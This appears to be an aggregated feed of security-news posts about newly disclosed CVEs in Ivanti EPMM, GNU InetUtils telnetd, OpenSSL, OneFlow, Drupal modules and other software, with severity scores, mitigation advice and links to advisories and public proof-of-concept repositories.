##updated 2026-01-29T22:15:53.313000
5 posts
🚨 [CISA-2026:0129] CISA Adds One Known Exploited Vulnerability to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0129)
CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2026-1281 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-1281)
- Name: Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Ivanti
- Product: Endpoint Manager Mobile (EPMM)
- Notes: Please adhere to Ivanti's guidelines to assess exposure and mitigate risks. Check for signs of potential compromise on all internet accessible Ivanti products affected by this vulnerability. Apply any final mitigations provided by the vendor as soon as possible. For more information please: see: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340 ; https://support.mobileiron.com/mi/vsp/AB1771634/ivanti-security-update-1761642-1.0.0S-5.noarch.rpm ; https://support.mobileiron.com/mi/vsp/AB1771634/ivanti-security-update-1761642-1.0.0L-5.noarch.rpm ; https://nvd.nist.gov/vuln/detail/CVE-2026-1281
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260129 #cisa20260129 #cve_2026_1281 #cve20261281
##🔴 CVE-2026-1340 - Critical (9.8)
A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1340/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Ivanti warns of two EPMM flaws exploited in zero-day attacks
Ivanti has disclosed two critical vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM), tracked as CVE-2026-1281 and CVE-2026-1340, that were...
🔗️ [Bleepingcomputer] https://link.is.it/teik2H
##🔴 CVE-2026-1340 - Critical (9.8)
A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1340/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Ivanti warns of two EPMM flaws exploited in zero-day attacks
Ivanti has disclosed two critical vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM), tracked as CVE-2026-1281 and CVE-2026-1340, that were...
🔗️ [Bleepingcomputer] https://link.is.it/teik2H
##updated 2026-01-29T22:15:53.140000
6 posts
📢 Ivanti alerte sur deux failles critiques EPMM exploitées en zero‑day (CVE‑2026‑1281/1340)
📝 Source: BleepingComputer — Ivanti a divulgué deux failles critiques dans En...
📖 cyberveille : https://cyberveille.ch/posts/2026-01-30-ivanti-alerte-sur-deux-failles-critiques-epmm-exploitees-en-zero-day-cve-2026-1281-1340/
🌐 source : https://www.bleepingcomputer.com/news/security/ivanti-warns-of-two-epmm-flaws-exploited-in-zero-day-attacks/
#CVE_2026_1281 #CVE_2026_1340 #Cyberveille
🚨 [CISA-2026:0129] CISA Adds One Known Exploited Vulnerability to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0129)
CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2026-1281 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-1281)
- Name: Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Ivanti
- Product: Endpoint Manager Mobile (EPMM)
- Notes: Please adhere to Ivanti's guidelines to assess exposure and mitigate risks. Check for signs of potential compromise on all internet accessible Ivanti products affected by this vulnerability. Apply any final mitigations provided by the vendor as soon as possible. For more information please: see: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340 ; https://support.mobileiron.com/mi/vsp/AB1771634/ivanti-security-update-1761642-1.0.0S-5.noarch.rpm ; https://support.mobileiron.com/mi/vsp/AB1771634/ivanti-security-update-1761642-1.0.0L-5.noarch.rpm ; https://nvd.nist.gov/vuln/detail/CVE-2026-1281
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260129 #cisa20260129 #cve_2026_1281 #cve20261281
##🔴 CVE-2026-1281 - Critical (9.8)
A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1281/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Ivanti warns of two EPMM flaws exploited in zero-day attacks
Ivanti has disclosed two critical vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM), tracked as CVE-2026-1281 and CVE-2026-1340, that were...
🔗️ [Bleepingcomputer] https://link.is.it/teik2H
##🔴 CVE-2026-1281 - Critical (9.8)
A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1281/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Ivanti warns of two EPMM flaws exploited in zero-day attacks
Ivanti has disclosed two critical vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM), tracked as CVE-2026-1281 and CVE-2026-1340, that were...
🔗️ [Bleepingcomputer] https://link.is.it/teik2H
##updated 2026-01-29T22:15:52.577000
2 posts
🟠 CVE-2025-69516 - High (8.8)
A Server-Side Template Injection (SSTI) vulnerability in the /reporting/templates/preview/ endpoint of Amidaware Tactical RMM, affecting versions equal to or earlier than v1.3.1, allows low-privileged users with Report Viewer or Report Manager per...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-69516/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-69516 - High (8.8)
A Server-Side Template Injection (SSTI) vulnerability in the /reporting/templates/preview/ endpoint of Amidaware Tactical RMM, affecting versions equal to or earlier than v1.3.1, allows low-privileged users with Report Viewer or Report Manager per...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-69516/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T21:30:26
1 posts
2 repos
https://github.com/tom025/ply_exploit_rejection
https://github.com/bohmiiidd/Undocumument_RCE_PLY-yacc-CVE-2025-56005
Critical Remote Code Execution Vulnerability Reported in Python PLY Library
A critical remote code execution vulnerability (CVE-2025-56005) was reported in the Python PLY library version 3.11 due to an undocumented and unsafe use of the pickle module. Attackers can exploit this flaw to run arbitrary code during parser initialization by providing a malicious pickle file.
**If you use Python PLY library, search and remove any use of the picklefile parameter - it's vulnerable with no fix available. Regenerate parser tables at startup instead and lock down write access to prevent attackers from planting malicious files.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-remote-code-execution-vulnerability-reported-in-python-ply-library-r-2-p-b-b/gD2P6Ple2L
updated 2026-01-29T21:15:52.617000
2 posts
🟠 CVE-2025-71003 - High (7.5)
An input validation vulnerability in the flow.arange() component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-71003/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-71003 - High (7.5)
An input validation vulnerability in the flow.arange() component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-71003/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T21:03:54.520000
1 posts
🟠 CVE-2026-22260 - High (7.5)
Suricata is a network IDS, IPS and NSM engine. Starting in version 8.0.0 and prior to version 8.0.3, Suricata can crash with a stack overflow. Version 8.0.3 patches the issue. As a workaround, use default values for `request-body-limit` and `respo...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22260/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T21:00:30.780000
3 posts
4 repos
https://github.com/Ashwesker/Ashwesker-CVE-2026-21962
https://github.com/ThumpBo/CVE-2026-21962
New Episode: SANS Stormcast Thursday, January 29th, 2026: WebLogic AI Slop; Fortinet Patches; WebLogic AI Slop; Fortinet Patches
Shownotes:
Odd WebLogic Request. Possible CVE-2026-21962 Exploit Attempt or AI Slop?
We are seeing attempts to attack CVE-2026-21962, a recent weblog vulnerability, using a non-working AI slop exploit
https://isc.sans.edu/diary/Odd%20WebLogic%20Reques
AntennaPod | Anytime Player | Apple Podcasts | Castamatic | CurioCaster | Fountain | gPodder | Overcast | Pocket Casts | Podcast Addict | Podcast Guru | Podnews | Podverse | Truefans
Or Listen right here.
##Odd WebLogic Request. Possible CVE-2026-21962 Exploit Attempt or AI Slop? https://isc.sans.edu/diary/32662
##EUVD has listed critical CVE-2026-21962 Oracle HTTP Server vulnerability https://euvd.enisa.europa.eu/vulnerability/EUVD-2026-3550
Oracle Critical Patch Update Advisory - January 2026 https://www.oracle.com/security-alerts/cpujan2026.html #infosec #vulnerability #Oracle
##updated 2026-01-29T20:16:10.277000
2 posts
🔴 CVE-2026-22806 - Critical (9.1)
vCluster Platform provides a Kubernetes platform for managing virtual clusters, multi-tenancy, and cluster sharing. Prior to versions 4.6.0, 4.5.4, 4.4.2, and 4.3.10, when an access key is created with a limited scope, the scope can be bypassed to...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22806/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-22806 - Critical (9.1)
vCluster Platform provides a Kubernetes platform for managing virtual clusters, multi-tenancy, and cluster sharing. Prior to versions 4.6.0, 4.5.4, 4.4.2, and 4.3.10, when an access key is created with a limited scope, the scope can be bypassed to...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22806/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T20:16:09.663000
2 posts
🔴 CVE-2025-69602 - Critical (9.1)
A session fixation vulnerability exists in 66biolinks v62.0.0 by AltumCode, where the application does not regenerate the session identifier after successful authentication. As a result, the same session cookie value is reused for users logging in...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-69602/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-69602 - Critical (9.1)
A session fixation vulnerability exists in 66biolinks v62.0.0 by AltumCode, where the application does not regenerate the session identifier after successful authentication. As a result, the same session cookie value is reused for users logging in...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-69602/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T19:16:19.890000
5 posts
43 repos
https://github.com/infat0x/CVE-2026-24061
https://github.com/ms0x08-dev/CVE-2026-24061-POC
https://github.com/balgan/CVE-2026-24061
https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root
https://github.com/Gabs-hub/CVE-2026-24061_Lab
https://github.com/BrainBob/Telnet-TestVuln-CVE-2026-24061
https://github.com/Lingzesec/CVE-2026-24061-GUI
https://github.com/SystemVll/CVE-2026-24061
https://github.com/m3ngx1ng/cve_2026_24061_cli
https://github.com/Parad0x7e/CVE-2026-24061
https://github.com/h3athen/CVE-2026-24061
https://github.com/parameciumzhang/Tell-Me-Root
https://github.com/MY0723/GNU-Inetutils-telnet-CVE-2026-24061-
https://github.com/duy-31/CVE-2026-24061---telnetd
https://github.com/punitdarji/telnetd-cve-2026-24061
https://github.com/z3n70/CVE-2026-24061
https://github.com/midox008/CVE-2026-24061
https://github.com/androidteacher/CVE-2026-24061-PoC-Telnetd
https://github.com/SafeBreach-Labs/CVE-2026-24061
https://github.com/yanxinwu946/CVE-2026-24061--telnetd
https://github.com/TryA9ain/CVE-2026-24061
https://github.com/cyberpoul/CVE-2026-24061-POC
https://github.com/cumakurt/tscan
https://github.com/leonjza/inetutils-telnetd-auth-bypass
https://github.com/hackingyseguridad/root
https://github.com/hilwa24/CVE-2026-24061
https://github.com/Mr-Zapi/CVE-2026-24061
https://github.com/xuemian168/CVE-2026-24061
https://github.com/typeconfused/CVE-2026-24061
https://github.com/madfxr/Twenty-Three-Scanner
https://github.com/r00tuser111/CVE-2026-24061
https://github.com/Ashwesker/Ashwesker-CVE-2026-24061
https://github.com/BrainBob/CVE-2026-24061
https://github.com/novitahk/Exploit-CVE-2026-24061
https://github.com/JayGLXR/CVE-2026-24061-POC
https://github.com/XsanFlip/CVE-2026-24061-Scanner
https://github.com/monstertsl/CVE-2026-24061
https://github.com/dotelpenguin/telnetd_CVE-2026-24061_tester
https://github.com/Chocapikk/CVE-2026-24061
https://github.com/0x7556/CVE-2026-24061
https://github.com/Alter-N0X/CVE-2026-24061-POC
Un accès root en une seule commande : cette faille dans GNU InetUtils menace les accès Telnet https://www.it-connect.fr/faille-cve-2026-24061-inetutils-telnet/ #ActuCybersécurité #Cybersécurité #Vulnérabilité
##Un accès root en une seule commande : cette faille dans GNU InetUtils menace les accès Telnet https://www.it-connect.fr/faille-cve-2026-24061-inetutils-telnet/ #ActuCybersécurité #Cybersécurité #Vulnérabilité
##⚪ 800,000 Telnet servers are vulnerable to remote attacks
🗨️ Shadowserver Foundation analysts are tracking nearly 800,000 IP addresses amid the active exploitation of a critical vulnerability, CVE-2026-24061, in the GNU InetUtils telnetd server component.
##Nearly 800,000 #Telnet servers exposed to remote attacks
The security flaw (CVE-2026-24061) already has a proof-of-concept exploit, impacts GNU InetUtils versions 1.9.3 (released in 2015) through 2.7, and was patched in version 2.8 (released on January 20).
##updated 2026-01-29T19:16:19.670000
1 posts
‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection
CVEs Published: January 27th, 2026
High and Moderate Severity Flaws:
▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions
▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow
Low Severity Flaws:
▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)
"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.
Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."
Writeup: https://aisle.com/blog/aisle-discovered-12-out-of-12-openssl-vulnerabilities
##updated 2026-01-29T19:16:19.483000
2 posts
🟠 CVE-2026-1610 - High (8.1)
A vulnerability was found in Tenda AX12 Pro V2 16.03.49.24_cn. Affected by this issue is some unknown functionality of the component Telnet Service. Performing a manipulation results in hard-coded credentials. The attack is possible to be carried ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1610/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-1610 - High (8.1)
A vulnerability was found in Tenda AX12 Pro V2 16.03.49.24_cn. Affected by this issue is some unknown functionality of the component Telnet Service. Performing a manipulation results in hard-coded credentials. The attack is possible to be carried ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1610/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T19:16:18.987000
4 posts
KiloView Encoder Account Takeover Vulnerability
KiloView video encoders contain a critical vulnerability (CVE-2026-1453) that allows unauthenticated attackers to create administrator accounts and take full control of the devices. The vendor has not yet released a public patch.
**Make sure all KiloView devices are isolated from the internet and accessible from trusted networks only. Then reach out to the vendor to get information of any upcoming patches. At the moment, there is no patch available.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/kiloview-encoder-account-takeover-vulnerability-g-t-5-9-l/gD2P6Ple2L
🔴 CVE-2026-1453 - Critical (9.8)
A missing authentication for critical function vulnerability in KiloView Encoder Series could allow an unauthenticated attacker to create or delete administrator accounts. This vulnerability can grant the attacker full administrative control over ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1453/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##KiloView Encoder Account Takeover Vulnerability
KiloView video encoders contain a critical vulnerability (CVE-2026-1453) that allows unauthenticated attackers to create administrator accounts and take full control of the devices. The vendor has not yet released a public patch.
**Make sure all KiloView devices are isolated from the internet and accessible from trusted networks only. Then reach out to the vendor to get information of any upcoming patches. At the moment, there is no patch available.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/kiloview-encoder-account-takeover-vulnerability-g-t-5-9-l/gD2P6Ple2L
🔴 CVE-2026-1453 - Critical (9.8)
A missing authentication for critical function vulnerability in KiloView Encoder Series could allow an unauthenticated attacker to create or delete administrator accounts. This vulnerability can grant the attacker full administrative control over ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1453/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T19:16:18.393000
6 posts
🟠 CVE-2025-71007 - High (7.5)
An input validation vulnerability in the oneflow.index_add component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-71007/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-71007 - High (7.5)
An input validation vulnerability in the oneflow.index_add component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-71007/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-71007 - High (7.5)
An input validation vulnerability in the oneflow.index_add component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-71007/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-71007 - High (7.5)
An input validation vulnerability in the oneflow.index_add component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-71007/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-71007 - High (7.5)
An input validation vulnerability in the oneflow.index_add component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-71007/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-71007 - High (7.5)
An input validation vulnerability in the oneflow.index_add component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-71007/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T19:16:16.243000
2 posts
🟠 CVE-2025-61726 - High (7.5)
The net/url package does not set a limit on the number of query parameters in a query. While the maximum size of query parameters in URLs is generally limited by the maximum request header size, the net/http.Request.ParseForm method can parse larg...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-61726/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-61726 - High (7.5)
The net/url package does not set a limit on the number of query parameters in a query. While the maximum size of query parameters in URLs is generally limited by the maximum request header size, the net/http.Request.ParseForm method can parse larg...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-61726/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T19:16:10.993000
2 posts
🟠 CVE-2025-14472 - High (8.1)
Cross-Site Request Forgery (CSRF) vulnerability in Drupal Acquia Content Hub allows Cross Site Request Forgery.This issue affects Acquia Content Hub: from 0.0.0 before 3.6.4, from 3.7.0 before 3.7.3.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-14472/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-14472 - High (8.1)
Cross-Site Request Forgery (CSRF) vulnerability in Drupal Acquia Content Hub allows Cross Site Request Forgery.This issue affects Acquia Content Hub: from 0.0.0 before 3.6.4, from 3.7.0 before 3.7.3.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-14472/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T19:16:10.837000
2 posts
🟠 CVE-2025-13986 - High (7.5)
Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Disable Login Page allows Functionality Bypass.This issue affects Disable Login Page: from 0.0.0 before 1.1.3.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-13986/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-13986 - High (7.5)
Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Disable Login Page allows Functionality Bypass.This issue affects Disable Login Page: from 0.0.0 before 1.1.3.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-13986/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T19:16:10.530000
2 posts
🟠 CVE-2025-13982 - High (8.1)
Cross-Site Request Forgery (CSRF) vulnerability in Drupal Login Time Restriction allows Cross Site Request Forgery.This issue affects Login Time Restriction: from 0.0.0 before 1.0.3.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-13982/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-13982 - High (8.1)
Cross-Site Request Forgery (CSRF) vulnerability in Drupal Login Time Restriction allows Cross Site Request Forgery.This issue affects Login Time Restriction: from 0.0.0 before 1.0.3.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-13982/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T17:16:25.253000
1 posts
🔴 CVE-2026-24897 - Critical (10)
Erugo is a self-hosted file-sharing platform. In versions up to and including 0.2.14, an authenticated low-privileged user can upload arbitrary files to any specified location due to insufficient validation of user‑supplied paths when creating s...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24897/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T17:16:22.587000
2 posts
🟠 CVE-2025-71000 - High (7.5)
An issue in the flow.cuda.BoolTensor component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-71000/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-71000 - High (7.5)
An issue in the flow.cuda.BoolTensor component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-71000/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T17:16:22.420000
2 posts
🟠 CVE-2025-70999 - High (7.5)
A GPU device-ID validation flaw in the flow.cuda.get_device_capability() component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted device ID.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70999/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-70999 - High (7.5)
A GPU device-ID validation flaw in the flow.cuda.get_device_capability() component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted device ID.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70999/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T17:16:20.240000
2 posts
🟠 CVE-2025-65891 - High (7.5)
A GPU device-ID validation flaw in OneFlow v0.9.0 allows attackers to trigger a Denial of Dervice (DoS) by invoking flow.cuda.get_device_properties() with an invalid or negative device index.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65891/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-65891 - High (7.5)
A GPU device-ID validation flaw in OneFlow v0.9.0 allows attackers to trigger a Denial of Dervice (DoS) by invoking flow.cuda.get_device_properties() with an invalid or negative device index.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65891/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T17:16:20.053000
2 posts
🟠 CVE-2025-65890 - High (7.5)
A device-ID validation flaw in OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) by calling flow.cuda.synchronize() with an invalid or out-of-range GPU device index.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65890/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-65890 - High (7.5)
A device-ID validation flaw in OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) by calling flow.cuda.synchronize() with an invalid or out-of-range GPU device index.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65890/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T17:16:19.917000
2 posts
🟠 CVE-2025-61731 - High (7.8)
Building a malicious file with cmd/go can cause can cause a write to an attacker-controlled file with partial control of the file content. The "#cgo pkg-config:" directive in a Go source file provides command-line arguments to provide to the Go pk...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-61731/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-61731 - High (7.8)
Building a malicious file with cmd/go can cause can cause a write to an attacker-controlled file with partial control of the file content. The "#cgo pkg-config:" directive in a Go source file provides command-line arguments to provide to the Go pk...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-61731/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T17:16:15.460000
2 posts
🟠 CVE-2025-14975 - High (8.1)
The Custom Login Page Customizer WordPress plugin before 2.5.4 does not have a proper password reset process, allowing a few unauthenticated requests to reset the password of any user by knowing their username, such as administrator ones, and ther...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-14975/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-14975 - High (8.1)
The Custom Login Page Customizer WordPress plugin before 2.5.4 does not have a proper password reset process, allowing a few unauthenticated requests to reset the password of any user by knowing their username, such as administrator ones, and ther...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-14975/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T17:16:15.243000
2 posts
🟠 CVE-2025-14840 - High (7.5)
Improper Check for Unusual or Exceptional Conditions vulnerability in Drupal HTTP Client Manager allows Forceful Browsing.This issue affects HTTP Client Manager: from 0.0.0 before 9.3.13, from 10.0.0 before 10.0.2, from 11.0.0 before 11.0.1.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-14840/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-14840 - High (7.5)
Improper Check for Unusual or Exceptional Conditions vulnerability in Drupal HTTP Client Manager allows Forceful Browsing.This issue affects HTTP Client Manager: from 0.0.0 before 9.3.13, from 10.0.0 before 10.0.2, from 11.0.0 before 11.0.1.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-14840/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
13 posts
2 repos
🔴 CVE-2025-15467 - Critical (9.8)
Issue summary: Parsing CMS AuthEnvelopedData message with maliciously
crafted AEAD parameters can trigger a stack buffer overflow.
Impact summary: A stack buffer overflow may lead to a crash, causing Denial
of Service, or potentially remote code ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-15467/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #programmingAtKukei https://masto.kukei.eu/browse/programming category:
- OpenSSL vulnerabilities and patches (CVE-2025-15467; 12 advisories)
- AI agent tooling and Model Context Protocol (MCP) including Claude Code benchmarks and multi‑agent pipelines
- FOSDEM 2026 and Python community events (PyCascades 2026; PyTexasConference2026)
- 11tyCMS public beta (IndieWeb/11tyCMS)
- Rust in Android and GPU [1/2]
📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.
Sources:
